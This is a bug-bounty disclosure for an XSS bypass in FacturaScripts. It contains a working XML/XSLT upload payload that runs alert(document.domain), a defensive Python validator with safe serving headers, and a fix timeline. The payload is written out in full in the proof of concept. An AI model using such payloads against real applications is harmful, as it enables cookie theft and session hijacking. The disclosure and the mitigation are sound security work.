xss bypass of https://huntr.dev/bounties/4bc8f164-faf8-4096-aa00-e439fa976876/ in neorazorx/facturascripts

Valid

Reported on

May 14th 2022


Description

xss bypass of https://huntr.dev/bounties/4bc8f164-faf8-4096-aa00-e439fa976876/

TESTED BROWSER

google chrome

Proof of Concept

This bug was fixed by serving the file with a text/xml content type, but that fix can also be bypassed. Save the file below as test.xml.

<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet
id ID #REQUIRED>]>
<!-- It works on Chrome/Safari/Edge and IE -->
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html" doctype-public="&gt;&lt;img src=x onerror=alert(document.domain)&gt;"  />
<xsl:template match="/">
<root/>
</xsl:template>
</xsl:stylesheet>

Upload it, then open the uploaded file: the XSS executes.
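The bypass above works because a document served as XML is still rendered by the browser, and an xml-stylesheet processing instruction lets that document apply an XSLT stylesheet, even one embedded in the same file, in the application's origin. The following is an added example, not code from FacturaScripts or from the reporter; the function names (xml_upload_findings, decide_upload) and the sample documents are assumptions. It shows the server-side handling that a content-type change alone does not provide: uploaded XML that carries a stylesheet reference or any XSLT element is rejected, and everything else is served as a download with nosniff so the browser never renders it inline. The check is written generally: it also catches a stylesheet that is not self-referencing.

```python
"""Reject uploaded XML that embeds an XSLT stylesheet; serve the rest inertly.

Added example (not FacturaScripts code). xml_upload_findings(), decide_upload()
and the sample documents below are assumptions made for illustration.
Requires Python 3.8+ for the "pi" iterparse event.
"""
import xml.etree.ElementTree as ET
from io import BytesIO

XSLT_NS = "http://www.w3.org/1999/XSL/Transform"


def xml_upload_findings(data: bytes) -> list:
    """Return the reasons an uploaded XML document must not be rendered by a browser.

    Flags an <?xml-stylesheet ...?> processing instruction (the browser applies
    the referenced stylesheet when it displays the document as XML) and any
    element in the XSLT namespace. Malformed XML is reported as well, because a
    browser may recover from the error differently than the server-side parser.
    """
    findings = []
    try:
        for event, node in ET.iterparse(BytesIO(data), events=("pi", "start")):
            if event == "pi":
                # ElementTree stores a PI as "<target> <data>" in node.text
                text = node.text or ""
                if text.split(None, 1)[0] == "xml-stylesheet":
                    findings.append("xml-stylesheet processing instruction: " + text)
            elif node.tag.startswith("{" + XSLT_NS + "}"):
                findings.append("XSLT element: " + node.tag)
    except ET.ParseError as exc:
        findings.append(f"malformed XML: {exc}")
    return findings


def decide_upload(data: bytes, filename: str) -> tuple:
    """Decide whether a stored XML upload may be kept and how it is served.

    Files that embed a stylesheet are rejected at upload time. Everything else is
    served as a download: Content-Disposition: attachment keeps the browser from
    displaying the document in the site's origin, X-Content-Type-Options: nosniff
    stops MIME sniffing of the body, and a sandboxing CSP is a second layer if
    the file is ever displayed anyway. `filename` is assumed to be a sanitized
    basename already (no quotes, path separators or line breaks).
    """
    findings = xml_upload_findings(data)
    if findings:
        return ("reject", findings)
    headers = {
        "Content-Type": "text/xml; charset=utf-8",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    return ("allow", headers)


# Constructed samples (not real uploads). The first mirrors the structure of
# the report's PoC (self-referencing stylesheet) with a harmless output element,
# the second is an XSLT document without the processing instruction, and the
# third is an ordinary data file.
SAMPLE_SELF_REFERENCING = b"""<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet id ID #REQUIRED>]>
<xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html"/>
<xsl:template match="/"><root/></xsl:template>
</xsl:stylesheet>
"""

SAMPLE_BARE_XSLT = b"""<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"><root/></xsl:template>
</xsl:stylesheet>
"""

SAMPLE_PLAIN_INVOICE = b"""<?xml version="1.0"?>
<invoice><number>F-0001</number><total>42.00</total></invoice>
"""

if __name__ == "__main__":
    for name, data in (("poc", SAMPLE_SELF_REFERENCING),
                       ("xslt", SAMPLE_BARE_XSLT),
                       ("invoice", SAMPLE_PLAIN_INVOICE)):
        print(name, decide_upload(data, name + ".xml"))
```

The rejection is deliberately based on the parsed document rather than a substring search, so an attacker-controlled encoding or whitespace in the processing instruction does not change the result; the download headers cover the case where a file that passed the check is later opened directly by its URL.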

Impact

The XSS allows an attacker to steal the victim's cookies.

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. a month ago
We have contacted a member of the neorazorx/facturascripts team and are waiting to hear back a month ago
Carlos Garcia validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carlos Garcia confirmed that a fix has been merged on f1ca50 a month ago
The fix bounty has been dropped
AppRouter.php#L90-L295 has been validated